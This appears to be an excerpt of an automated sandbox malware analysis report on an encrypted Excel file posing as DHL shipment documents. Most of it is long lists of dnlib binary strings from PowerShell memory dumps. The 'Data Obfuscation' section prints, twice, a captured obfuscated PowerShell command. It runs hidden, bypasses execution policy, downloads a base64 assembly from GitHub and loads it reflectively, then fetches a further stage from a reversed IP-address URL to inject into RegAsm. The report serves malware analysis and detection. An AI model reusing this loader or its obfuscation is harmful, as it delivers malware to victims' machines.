                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldProps source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumModuleRefs source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeProps source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldProps source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineParam source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetClassLayout source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteToken source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumPermissionSets source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUnresolvedMethods source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineNestedType source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: 7C:\Users\user\AppData\Local\Temp\00kppfao\00kppfao.pdbhP source: powershell.exe, 00000007.00000002.433523996.0000000002F0C000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17 source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetRVA source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleFromScope source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethodImpl source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePinvokeMap source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetClassLayout source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineSecurityAttributeSet source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMemberRef source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPermissionSetProps source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetTypeDefProps source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineProperty source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeDefByName source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetModuleProps source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldRVA source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFieldsWithName source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMemberRefs source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResolveTypeRef source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToStream source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodSemantics source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeDefProps source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNestedClassProps source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMethod source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeletePinvokeMap source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromTypeSpec source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodImplFlags source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPinvokeMap source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumSignatures source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPinvokeMap source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldMarshal source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUserStrings source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetRVA source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePermissionSet source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodProps source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPropertyProps source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 0000000E.00000002.476880205.000007FE89A88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.478544858.000007FE89C30000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.497351507.000007FE89C50000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetUserString source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetInterfaceImplProps source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldMarshal source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeDef source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeDefs source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportMember source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumInterfaceImpls source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberProps source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportType source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromSig source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.dotnetfullnamecreatordnlib.dotnet.emitnativemethodbodyah6t8o3uffkxjgu59cevu8z6d3v7afoyij1iva`1dnlib.dotnetfiledefuserdnlib.pemachinednlib.dotnetarraysigbasednlib.dotnetcaargumentdnlib.dotnetcorlibtypesigk7mitcpdacx0vbmgqr7go6sqfpjjw30jf7n7rndnlib.dotnetelementtypednlib.dotnet.writernetresourcese9knvnt7u6ezsdsyxfxq2zthltuqwadl1q4ng9uydph65qnfdjckrw9h9dnlib.dotnetszarraysigdnlib.dotnetmanifestresourceattributesdnlib.dotnetmethodoverrider3jb0by5afjjlcspugywt02vwyehjyzy3wqzjcdnlib.dotnet.writerdeclsecuritywriterdnlib.dotnet.mdrawgenericparamrowdnlib.dotnetiassemblyxvmacrdbfrna5cdrrsfcqrsledc4wkisxlwn8gx0r4etd8ltoqpdggldcnnyflydokrpals0wxhldnlib.dotnetgenericargumentsdnlib.dotnetfieldsigtimivifhsjslaapdgc5hhptoaf6vr7ylgvksrsdnlib.dotnetexportedtypednlib.dotnetimporteroptionstvcwigwbgbhgtsv2wgudnpckvwengjxlflbtcgdnlib.threadinglistiteratedelegate`1origsectione6whkeiu6j5uz8xzsbjwa9opui5h9kdvhcycmq<findconstructors>d__279dnlib.peimagentheadersdnlib.threadingextensionsdnlib.dotnetmodulecontextdnlib.dotneteventattributeswtroi5hszw8mdtxowuckya5b1hwfqiio31nfpol5kjpak7nhlkgm40bsnkxlemxzxah7kglyl2`2dnlib.dotnet.writerhotpooldnlib.dotnet.writericustomattributewriterhelperdnlib.dotnetalltypeshelperdnlib.dotnetsignaturealgorithmdnlib.dotnetmodulerefdnlib.iofilesectionty9dl25bl5pkcespd8tdnlib.threadingenumerableiteratealldelegate`1bia61ly7isto9pg5c9upcniidyu8622j474ov4dnlib.dotnet.pdb.managedpdbexceptiondnlib.dotnetleafsigkkoi8p4jm718hslt5bhdnlib.iomemoryimagestreamdnlib.dotnetmoduledefatfnpjcoreq6csgbsv8ppuh1vcgppflbdi2g14dnlib.dotnetgenericparamconstraintigufyy4regnwyq1l7j2dnlib.dotnet.mdstreamheaderolyifw3a2xfhdqcmgs4xnjn0z3dkxdtlsxaunh`1dnlib.ioibinaryreaderdnlib.dotnetimemberforwardeddnlib.dotnet.mdrawfieldrvarowdnlib.dotnetmarshalblobreaderhpalqfwouqcwnyvnxdxwq6pt5wgiqjnsebvd25dnlib.dotnet.writerhottablednlib.dotnetsigcomparerdnlib.iohomednlib.dotnettypeattributesdnlib.dotnetclasslayoutdnlib.dotnet.writerwin32resourceschunkdnlib.utilsilistlistener`1dnlib.dotnet.mdrawassemblyrefprocessorrowdnlib.dotnetigenericparameterproviderdnlib.ioapidnlib.dotnet.mdusstreamdnlib.dotnet.mdstringsstreamdnlib.dotnetassemblyresolveexception<>c__displayclass3_0`1dnlib.dotnetsafearraymarshaltypednlib.dotnetembeddedresourceavp7wcnjztffdx0erdwdnlib.dotnet.mdstorageflagsgaoaeqinjnrekdu1h8hkbymkfitnjqeqghb8yydnlib.dotnetinterfaceimpluserdnlib.dotnetimporterkdrexyhvyhc0nelp9e7ed2uglhrb3lwb2yb4hxg3ul7p5rcldjjfrjjltdnlib.dotnet.mdcolumnsizeotmggti9ivome3mt801aqpvaiiy0wnw9zf4n76<findassembliesmodulesearchpaths>d__60dnlib.dotnetresourcetypednlib.dotnet.emitmethodbodyreaderdnlib.dotnet.emitextensionsdnlib.dotnetfieldequalitycomparerdnlib.dotnetiimplementationdnlib.dotnet.mdraweventmaprowdnlib.dotnet.mdrawparamrowdnlib.dotnetistringdecrypterawhfvsxzxunrwtavn9wvvxbkvxvaipsmu94pk1dnlib.dotnetpublickeybasednlib.dotnet.mdrawmethodptrrowdnlib.dotnetfiledefdnlib.dotnet.mdrawpropertyrowdnlib.dotnet.writerhottable20wv7tomzo7klytloylsuafu1afzgo0sk6mcdcbwdnlib.ioioextensionsdnlib.dotnet.writer
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumEvents source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.dotnet.mdrawenclogrow__staticarrayinittypesize=128skchoafiuzccagfu1ulu1ouewfnp4o5bbcebordnlib.dotnet.pdb.dssisymunmanagednamespacednlib.dotnetgenericparamcontextdnlib.peimageoptionalheader64<findinstanceconstructors>d__278dnlib.dotnet.mdrawnestedclassrowdnlib.dotnetextensionsdnlib.dotneteventdefvmgiohu4rhlwjc4ft3cwirwxoundyanqcsxgkwdnlib.dotnet.emitlocals9bza01aif9aby4c7e3ahci7r1cnumtb0pe7f8dnlib.dotneticontainsgenericparameterufifkpi0yhtg01xooqbyjsrq8i9dalkxs2njixtein7yneywyrkdslyi5pfofj6nsx3lilmvvwyndnlib.dotnetitokenoperanddnlib.dotnet.writerimdtablednlib.pedllcharacteristicsdnlib.dotnetifullnamednlib.dotnet.resourcesresourcereaderdnlib.dotnetstrongnamepublickeydnlib.dotnet.mdrawassemblyprocessorrowdnlib.dotnetbytearrayequalitycomparerdnlib.dotnet.mdrawmethodsemanticsrowrp3lvqhb5ifi4taqpd9afqlx6hcsqlvfkjo6chdnlib.ioiimagestreamcreatorvr1yetiu8dvhejimmsiwb5fzoizgxereurgyrsdnlib.dotnetvtablefixupsgehb0jpvekcjp0ycr56pgg8xgprx0iwziqn2f4e1ykpxrjj6hxigaeczqbv1mzwr3pwlopq0c4cnocert0ntxbgf7cnqyqorvjg0ipa7p7ofpwst1tymadi6pcurl8pr4ri24gicobxd5km0gnm6s9hthdhm4vdevnfwhymlslrdnlib.dotnet.pdbsymbolreadercreatordnlib.dotnet.emitinstructionprinterdnlib.dotnettypeequalitycomparerbkhyunxgsdfmobt2myul69nrax8isvyd3tqlo1dnlib.dotnet.mdimagecor20headerdnlib.dotnet.mdirawrowdnlib.dotnet.writermethodbodywritera3owm62mw2ft3axtgkjup19wm2wy2htzvwhoqe<getrawrows>d__31dnlib.dotnetihasdeclsecuritydnlib.dotnet.pdb.dssisymunmanagedscopeur0afvcnmzwmqprmskojh6uhgca7lvtsnn1fdmdnlib.dotnetimanagedentrypoint<findall>d__5<getextramonopaths>d__55startup_informationexbiw1pkeigwdnnfrwilubmrcpstrr5ffy9zo9rgv46w33uubdimq2y3bhugkfjzcyofuu3za67`1dnlib.dotnet.writerstrongnamesignaturednlib.dotnetitypednlib.dotnetsentinelsigdnlib.dotnet.mdicolumnreaderdnlib.dotnet.writermodulewritereventdnlib.dotnettypenameparser<findall>d__9tfrag8naffslgxf79u7dnlib.dotneticustomattributednlib.dotnet.pdb.dsssymbolwritercreatorhcgmpba7kqxx2lyt8vfdautss9c8jychnidlusesxe109d6cukcleumrlqtus9jnueozxcxvhttrhu2kpenzk7dlbeo0kerdnlib.dotnet.resourcesbinaryresourcedatadnlib.dotnet.mdrawtyperefrowdnlib.ioimagestreamcreatorhjf2fnil2b66qgwad8ycksrm9iotoquh1mnuhadnlib.pepeextensionsdnlib.dotnet.pdbsequencepointdnlib.dotnetlinkedresource<getenumerator_nolock>d__45dnlib.dotnettyperefdnlib.dotnetpublickeydnlib.dotnetiassemblyreffinderdnlib.dotnet.mdrawgenericparamconstraintrow__staticarrayinittypesize=24bk4vsrp761al27krcu4kv79wgpumrzq7kalgccdnlib.dotnettypedefdnlib.dotnetrecursioncounterdnlib.dotnet.mdrawassemblyrefosrowdnlib.pecharacteristicsdnlib.w32resourcesresourcedirectorype source: powershell.exe, 00000020.00000002.497351507.000007FE89C53000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamForMethodIndex source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineField source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsGlobal source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodsWithName source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetEventProps source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: D5230000.0.drInitial sample: OLE indicators vbamacros = False
                    Source: DHL Shipment Doc's.xlsInitial sample: OLE indicators encrypted = True

                    Data Obfuscation

                    barindex
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{'+'2'+'}'+'u'+'rl'+' '+'= {0}https://raw.gi'+'t'+'hu'+'buserco'+'ntent.co'+'m'+'/NoDet'+'e'+'ctOn/N'+'oDetec'+'tOn/'+'re'+'f'+'s/hea'+'ds/mai'+'n/Deta'+'hNoth-V'+'.txt{0};'+' {'+'2}base'+'64Content = (New-'+'Object'+' Sys'+'tem.N'+'e'+'t'+'.W'+'e'+'bClient).Do'+'wn'+'loa'+'d'+'String({2'+'}u'+'rl)'+'; {'+'2'+'}'+'binaryContent = ['+'S'+'y'+'stem'+'.Co'+'n'+'v'+'ert]::Fro'+'mBase64St'+'ring({'+'2'+'}base'+'64Co'+'nt'+'ent); {'+'2}asse'+'mbly = [Re'+'flect'+'ion'+'.Ass'+'embl'+'y'+']::'+'Load({2}binar'+'yCo'+'n'+'tent); ['+'dn'+'lib.IO.Home]::VAI({1}'+'txt.'+'V'+'VBGF'+'R'+'/7'+'9'+'/02.'+'02'+'2.3.2'+'91/'+'/'+':'+'ptth{1},'+' {'+'1}'+'desat'+'ivado{1'+'}, {1}'+'d'+'esati'+'v'+'ado{1}, '+'{1'+'}desa'+'tivado{'+'1},'+' '+'{1}RegAsm{1},'+' {1}{1},{1}{1})') -f[CHar]39,[CHar]34,[CHar]36) | &( $ENV:COmsPEC[4,26,25]-JOIN'')"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{'+'2'+'}'+'u'+'rl'+' '+'= {0}https://raw.gi'+'t'+'hu'+'buserco'+'ntent.co'+'m'+'/NoDet'+'e'+'ctOn/N'+'oDetec'+'tOn/'+'re'+'f'+'s/hea'+'ds/mai'+'n/Deta'+'hNoth-V'+'.txt{0};'+' {'+'2}base'+'64Content = (New-'+'Object'+' Sys'+'tem.N'+'e'+'t'+'.W'+'e'+'bClient).Do'+'wn'+'loa'+'d'+'String({2'+'}u'+'rl)'+'; {'+'2'+'}'+'binaryContent = ['+'S'+'y'+'stem'+'.Co'+'n'+'v'+'ert]::Fro'+'mBase64St'+'ring({'+'2'+'}base'+'64Co'+'nt'+'ent); {'+'2}asse'+'mbly = [Re'+'flect'+'ion'+'.Ass'+'embl'+'y'+']::'+'Load({2}binar'+'yCo'+'n'+'tent); ['+'dn'+'lib.IO.Home]::VAI({1}'+'txt.'+'V'+'VBGF'+'R'+'/7'+'9'+'/02.'+'02'+'2.3.2'+'91/'+'/'+':'+'ptth{1},'+' {'+'1}'+'desat'+'ivado{1'+'}, {1}'+'d'+'esati'+'v'+'ado{1}, '+'{1'+'}desa'+'tivado{'+'1},'+' '+'{1}RegAsm{1},'+' {1}{1},{1}{1})') -f[CHar]39,[CHar]34,[CHar]36) | &( $ENV:COmsPEC[4,26,25]-JOIN'')"
